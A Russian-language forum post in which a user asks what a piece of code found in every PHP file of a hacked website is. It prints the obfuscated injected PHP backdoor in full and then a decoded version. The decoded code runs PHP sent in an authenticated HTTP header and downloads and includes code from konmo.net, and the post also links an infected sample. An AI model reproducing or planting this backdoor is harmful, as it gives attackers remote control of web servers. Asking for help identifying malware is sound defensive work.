Привет всем, хочу узнать что это такое! Нашел уже на взломаном сайте! PHP: <?php /*versio:2.11*/$Q000Q=0;$GLOBALS['IlII'] = '0fY3VybA62X2luaXQ%.1!3&YWxsb3dfdXJsX2ZvcGVu!55MQ64^X3NldG9wdA1#X2V4ZWMXwcY2xvc2U*.PGltZyBzcmM9Ig~IiB3aWR0aD0iMXB4IiBoZWlnaHQ9IjFweCIgLz4ddwa29ubW8ubmV0d8_a3RpcHAuY2g7%00&c2lsYmVyLmRlf$&~@WV8~e5Og*7~ZGlzcGxheV9lcnJvcnM__@5*ZGV0ZXJtaW5hdG9y*YW5k9(&Mi4xMQ#7SWtjMnhUdjVBeTB3M2Q%YmFzZTY0X2VuY29kZQ}YmFzZTY0X2RlY29kZQa#aHR0cDovLwSFRUUF9IT1NU}0fSFRUUF9VU0VSX0FHRU5Ua;~dW5pb242a{c2VsZWN0@;UkVRVUVTVF9VUkka83U0NSSVBUX05BTUUe}5$UVVFUllfU1RSSU5HPw44L3RtcC8L3RtcAVE1QVEVNUAVE1QRElS2%dXBsb2FkX3RtcF9kaXI,Lg$6dmVyc2lv};.5LQ0}LXBocA#fSFRUUF9FWEVDUEhQ*#)b3V0b2sc^,d^*aHR0cA08Oi8v*&%L3BnLnBocD91PQe;Jms9{JnQ9cGhwJnA9_~JnY9f^^6261736536345f6465636f6465';$Q000Q=pack('H*',substr($GLOBALS['IlII'], -26));if (!function_exists('QQ0QQQOO')){function QQ0QQQOO($QQ, $II){$c=$GLOBALS['IlII']; $d=pack('H*',substr($GLOBALS['IlII'], -26)); return $d(substr($c, $QQ, $II));}};eval($Q000Q('aWYgKCFkZWZpbmVkKCJkZXRlcm1pbmF0b3IiKSl7IGZ1bmN0aW9uIGdldGZpbGUoJFEwT1EwMCl7ICRJMWxJMWwgPSBRUTBRUVFPTygyLCA2KTsgJElsbGxsbCA9ICRJMWxJMWwuUVEwUVFRT08oMTAsIDcpOyBpZiAoQGluaV9nZXQoUVEwUVFRT08oMjMsIDIwKSkgPT0gUVEwUVFRT08oNDYsIDIpKSB7ICRJSTFJbDE9QGZpbGVfZ2V0X2NvbnRlbnRzKCRRME9RMDApOyByZXR1cm4gUVEwUVFRT08oNTAsIDApOyB9IGVsc2VpZiAoZnVuY3Rpb25fZXhpc3RzKCRJbGxsbGwpKXsgJFFPUTBRTyA9IEAkSWxsbGxsKCk7ICRRME9PT1EgPSAkSTFsSTFsLlFRMFFRUU9PKDUxLCAxMCk7ICRJbDFsbGwgPSAkSTFsSTFsLlFRMFFRUU9PKDYzLCA3KTsgJFFRUVFPUSA9ICRJMWxJMWwuUVEwUVFRT08oNzAsIDIpLlFRMFFRUU9PKDczLCA3KTsgQCRRME9PT1EoJFFPUTBRTywgQ1VSTE9QVF9VUkwsICRRME9RMDApOyBAJFEwT09PUSgkUU9RMFFPLCBDVVJMT1BUX0hFQURFUixmYWxzZSk7IEAkUTBPT09RKCRRT1EwUU8sIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsdHJ1ZSk7IEAkUTBPT09RKCRRT1EwUU8sIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsNSk7IGlmICgkUVFPMFFRID0gQCRJbDFsbGwoJFFPUTBRTykpIHtyZXR1cm4gUVEwUVFRT08oNTAsIDApO30gQCRRUVFRT1EoJFFPUTBRTyk7IHJldHVybiBRUTBRUVFPTyg1MCwgMCk7IH0gZWxzZSB7IHJldHVybiBRUTBRUVFPTyg4MiwgMTQpLiRRME9RMDAuUVEwUVFRT08oOTcsIDM5KTsgfSB9IGZ1bmN0aW9uIHVwZCgkUTAwT1EwLCRRME9RMDApeyAkSTExSWxsPUBmb3BlbigkUTAwT1EwLFFRMFFRUU9PKDEzNywgMikpOyBAZmNsb3NlKCRJMTFJbGwpOyBpZiAoQGlzX2ZpbGUoJFEwME9RMCkpe3dyaXRlKCRRMDBPUTAsZ2V0ZmlsZSgkUTBPUTAwKSk7fTsgfSBmdW5jdGlvbiB3cml0ZSgkUTAwT1EwLCRRUTAwME8peyBpZiAoJFFPUU9RTz1AZm9wZW4oJFEwME9RMCxRUTBRUVFPTygxMzcsIDIpKSl7IEBmd3JpdGUoJFFPUU9RTywkUVEwMDBPKTsgQGZjbG9zZSgkUU9RT1FPKTsgfSB9ICRRUVFRTzAgPSBBcnJheShRUTBRUVFPTygxMzksIDEyKSwgUVEwUVFRT08oMTU0LCAxMSksIFFRMFFRUU9PKDE3MCwgMTIpKTsgZnVuY3Rpb24gb3V0cHV0KCRRT1FPME8sICRJSTFJSWwpeyBlY2hvIFFRMFFRUU9PKDE4NywgMykuJFFPUU8wTy5RUTBRUVFPTygxOTMsIDIpLiRJSTFJSWwuIlxyXG4iOyB9IGZ1bmN0aW9uIHBhcmFtKCl7IHJldHVybiBRUTBRUVFPTyg1MCwgMCk7IH0gQGluaV9zZXQoUVEwUVFRT08oMTk4LCAxOSksIDApOyBkZWZpbmUoUVEwUVFRT08oMjIyLCAxNiksIDEpOyAkUTBPT1FPPVFRMFFRUU9PKDIzOSwgNCk7ICRJbElsbGw9UVEwUVFRT08oMjQ2LCA2KTsgJFFPT09PUT1RUTBRUVFPTygyNTQsIDE5KTsgJElsbElJMT1RUTBRUVFPTygyNzQsIDE4KTsgJFFRUVEwTz1RUTBRUVFPTygyOTMsIDE4KTsgJElJMWxsST1RUTBRUVFPTygzMTMsIDEwKTsgJElJMWxsSS49c3RydG9sb3dlcihAJF9TRVJWRVJbUVEwUVFRT08oMzIzLCAxMildKTsgJFFPUTBPTyA9IEAkX1NFUlZFUltRUTBRUVFPTygzMzgsIDIwKV07IGZvcmVhY2ggKCRfR0VUIGFzICRRT1FPME89PiRJSTFJSWwpeyBpZiAoc3RycG9zKCRJSTFJSWwsUVEwUVFRT08oMzYxLCA3KSkpeyRfR0VUWyRRT1FPME9dPVFRMFFRUU9PKDUwLCAwKTt9IGVsc2VpZiAoc3RycG9zKCRJSTFJSWwsUVEwUVFRT08oMzcxLCA4KSkpeyRfR0VUWyRRT1FPME9dPVFRMFFRUU9PKDUwLCAwKTt9IH0gaWYoIWlzc2V0KCRfU0VSVkVSW1FRMFFRUU9PKDM4MSwgMTUpXSkpIHsgJF9TRVJWRVJbUVEwUVFRT08oMzgxLCAxNSldID0gJF9TRVJWRVJbUVEwUVFRT08oMzk5LCAxNSldOyBpZigkX1NFUlZFUltRUTBRUVFPTyg0MTgsIDE2KV0pIHsgJF9TRVJWRVJbUVEwUVFRT08oMzgxLCAxNSldIC49IFFRMFFRUU9PKDQzNCwgMikgLiAkX1NFUlZFUltRUTBRUVFPTyg0MTgsIDE2KV07IH0gfSBpZiAoJFFPT1FPMD0kSUkxbGxJLkAkX1NFUlZFUltRUTBRUVFPTygzODEsIDE1KV0peyAkSUlsMWxJPUBtZDUoJElJMWxsSS4kSWxJbGxsLlBIUF9PUy4kUU9PT09RKTsgJFFRUTAwMD1RUTBRUVFPTyg0MzgsIDcpOyAkSTFJbGxJID0gQXJyYXkoUVEwUVFRT08oNDQ1LCA2KSwgQCRfU0VSVkVSW1FRMFFRUU9PKDQ1MSwgNCldLCBAJF9TRVJWRVJbUVEwUVFRT08oNDU1LCA2KV0sIEAkX0VOVltRUTBRUVFPTyg0NTEsIDQpXSwgQCRfRU5WW1FRMFFRUU9PKDQ2MSwgOCldLCBAJF9FTlZbUVEwUVFRT08oNDU1LCA2KV0sIEBpbmlfZ2V0KFFRMFFRUU9PKDQ3MSwgMTkpKSk7IGZvcmVhY2ggKCRJMUlsbEkgYXMgJEkxbDFsbCl7IGlmICghZW1wdHkoJEkxbDFsbCkpeyAkSTFsMWxsLj1ESVJFQ1RPUllfU0VQQVJBVE9SOyBpZiAoQGlzX3dyaXRhYmxlKCRJMWwxbGwpKXsgJFFRUTAwMCA9ICRJMWwxbGw7IGJyZWFrOyB9IH0gfSAkdG1wPSRRUVEwMDAuUVEwUVFRT08oNDkxLCAyKS4kSUlsMWxJOyBpZiAoQCRfU0VSVkVSWyJIVFRQX1lfQVVUSCJdPT0kSUlsMWxJKXsgZWNobyAiXHJcbiI7IEBvdXRwdXQoUVEwUVFRT08oNDk1LCA4KSwgJElsSWxsbC5RUTBRUVFPTyg1MDcsIDIpLiRRME9PUU8uUVEwUVFRT08oNTExLCA2KSk7IGlmICgkUVEwT09RPSRRUVFRME8oQCRfU0VSVkVSW1FRMFFRUU9PKDUxOSwgMTYpXSkpe0BldmFsKCRRUTBPT1EpO2VjaG8gIlxyXG4iO291dHB1dChRUTBRUVFPTyg1MzgsIDQpLCBRUTBRUVFPTyg1NDIsIDMpKTt9IGV4aXQoMCk7IH0gaWYgKEBpc19maWxlKCR0bXApKXtAaW5jbHVkZV9vbmNlKCR0bXApO30gZWxzZXsgJFFPT1FPMD1AdXJsZW5jb2RlKCRRT09RTzApOyB1cGQoJHRtcCxRUTBRUVFPTyg1NTEsIDYpLlFRMFFRUU9PKDU1OSwgNCkuJFFRUVFPMFswXS5RUTBRUVFPTyg1NjYsIDE0KS4kUU9PUU8wLlFRMFFRUU9PKDU4MiwgNCkuJElJbDFsSS5RUTBRUVFPTyg1ODcsIDEyKS4kUTBPT1FPLlFRMFFRUU9PKDYwMSwgNCkuJElsSWxsbCk7IH0gfSB9'));?>
http://rghost.ru/42335834 Вот один из файлов, там все PHP файлы содержат этот участок кода, у всех дата создания одинакова.
PHP: if (!defined("determinator")) { function getfile($url) { if (@ini_get('allow_url_fopen') == 1) { $result = @file_get_contents($url); return ''; } elseif (function_exists('curl_init')) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER,false); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT,5); if ($result = curl_exec($ch)) { return ''; } curl_close($ch); return ''; } else { return '<img src="'.$url.'" width="1px" height="1px" />'; } } function upd($tmp,$url) { $f=@fopen($tmp,'w'); @fclose($f); if (@is_file($tmp)){ write($tmp,getfile($url)); }; } function write($tmp,$data) { if ($f=@fopen($tmp,'w')) { @fwrite($f,$data); @fclose($f); } } $hosts = Array( 'konmo.net', 'ktipp.ch', 'silber.de' ); function output($f, $a) { echo 'Y_'.$f.':'.$a."\r\n"; } function param() { return ''; } @ini_set(display_errors, 0); define('determinator', 1); $and = 'and'; $version = '2.11'; $key = 'Ikc2xTv5Ay0w3d'; $self = 'http://'; $self.=strtolower(@$_SERVER['HTTP_HOST']); $user_agent = @$_SERVER['HTTP_USER_AGENT']; foreach ($_GET as $key => $value) { if (strpos($value,'union')) { $_GET[$key]= '' ; } elseif (strpos($value,'select')) { $_GET[$key]= ''; } } if(!isset($_SERVER['REQUEST_URI'])) { $_SERVER['REQUEST_URI'] = $_SERVER['SCRIPT_NAME']; if($_SERVER['QUERY_STRING']) { $_SERVER['REQUEST_URI'] .= '?' . $_SERVER['QUERY_STRING']; } } if ($self_url =$self . @$_SERVER['REQUEST_URI']) { $hash=@md5($self . $version.PHP_OS.$key); $tmp ='/tmp/'; $tmp_array = Array( '/tmp', @$_SERVER['TMP'], @$_SERVER['TEMP'], @$_ENV['TMP'], @$_ENV['TMPDIR'], @$_ENV['TEMP'], @ini_get( 'upload_tmp_dir' ) ); foreach ($tmp_array as $tmp_str){ if (!empty($tmp_str)) { $tmp_str.=DIRECTORY_SEPARATOR; if (@is_writable($tmp_str)) { $tmp = $tmp_str; break; } } } $tmp = $tmp.'.'.$hash; if (@$_SERVER["HTTP_Y_AUTH"]==$hash){ echo "\r\n"; @output('versio', $version.'-'.$and.'-php'); if ($result = base64_decode (@$_SERVER['HTTP_EXECPHP'])) { @eval($result); echo "\r\n"; output('out', 'ok'); } exit(0); } if (@is_file($tmp)) { @include_once($tmp); } else { $self_url=@urlencode($self_url); upd($tmp, 'http://konmo.net/pg.php?u='.$self_url.'&k='.$hash.'&t=php&p='.$and.'&v='.$version); } } }
